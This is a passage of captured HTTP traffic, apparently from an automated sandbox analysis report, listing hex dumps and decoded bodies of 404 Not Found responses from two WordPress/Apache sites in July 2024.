c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:51:49 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:51:52 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:00 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:06 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:08 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:52:28 GMTServer: ApacheX-Powered-By: PHP/8.2.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 35 3e ff 42 c0 fb a2 d1 58 ce c2 eb 28 0d 2e e2 79 94 04 e3 64 be 5f ad cb cb cb e0 3a 59 af d6 a3 c8 51 a9 16 ce 56 51 ba 08 57 40 03 4d d0 69 2d 5c 2e 67 f1 38 5c c5 c9 a2 91 66 d9 97 57 f3 19 5e 11 02 4e 6b f6 50 bd 47 69 f8 cf 75 f2 d8 fb 26 8a 26 25 1c 86 06 25 eb 2c 1b 9f 27 c9 8c ba 6e 4c 51 b2 51 2b 8e f5 1e 00 78 9e cc e7 20 81 ec 06 90 00 1a ae 62 83 94 8d d3 78 b9 52 58 58 45 57 ab c6 bb f0 22 94 a7 a0 9c c6 bf 79 4f 3e ff f9 f9 d7 cf de 3c fb d9 fb b7 c6 67 97 98 c3 e4 32 18 5e 2e a3 79 f2 2e 7e 1d ad 56 f1 e2 2c f3 4e bd 0f b5 51 98 45 3f a5 b3 da 09 13 55 76 f2 b6 f1 b6 91 05 97 44 56 6f 1b f1 1c 74 94 bd 6d 8c 93 34 7a db e0 ca 6f 1b ad 6e d0 0c 9a 6f 1b 83 f6 d5 a0 fd b6 51 ab d7 00 00 ea 07 cb c5 19 be 64 17 67 b7 6b 0f 15 b9 35 fc 7e 21 0d e2 13 35 98 ac d3 71 54 3b f9 50 c3 02 c2 6c 33 18 0a 5e 06 d7 3d 85 6f 1b 97 4b 3f 5e 8c 67 eb 09 0d e1 1d fe e3 01 57 f6 b1 a6 22 8c 3b 98 c7 8b e0 5d f6 d7 8b 28 3d ed 07 dd a0 57 fb f8 f1 31 b0 f7 b9 f7 e6 3c ce 3c 5a 71 1e 7e 87 eb 55 e2 9f 45 8b 28 45 e7 13 42 e8 e7 d3 f5 62 4c 64 77 10 d7 17 87 1f 2e c2 d4 4b ea 59 3d 7a ac 9f 7b e3 83 e8 f0 c3 2a bd e6 77 ab d3 0f d9 7a 49 4c e0 4d 94 ad b2 93 a8 be c2 c2 c8 56 e1 7c 79 72 b0 88 2e bd af d1 f0 61 